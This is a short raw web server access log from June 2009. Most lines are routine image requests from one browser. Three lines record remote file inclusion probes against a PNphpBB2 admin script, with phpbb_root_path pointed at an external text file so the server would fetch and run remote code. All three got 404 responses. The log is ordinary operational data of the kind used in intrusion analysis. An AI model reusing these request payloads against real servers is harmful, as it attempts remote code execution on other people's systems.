214.1.240.252 - - [16/Jun/2009:01:23:33 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0900016" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:23:33 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0900016" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:23:34 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0900016" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:23:34 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0900016" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.82.228.83 - - [16/Jun/2009:01:23:48 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:23:48 -0400] "GET /logs/access_log.Q109053100/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:23:48 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
214.1.240.252 - - [16/Jun/2009:01:23:54 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0900016" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:23:54 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:23:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:23:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
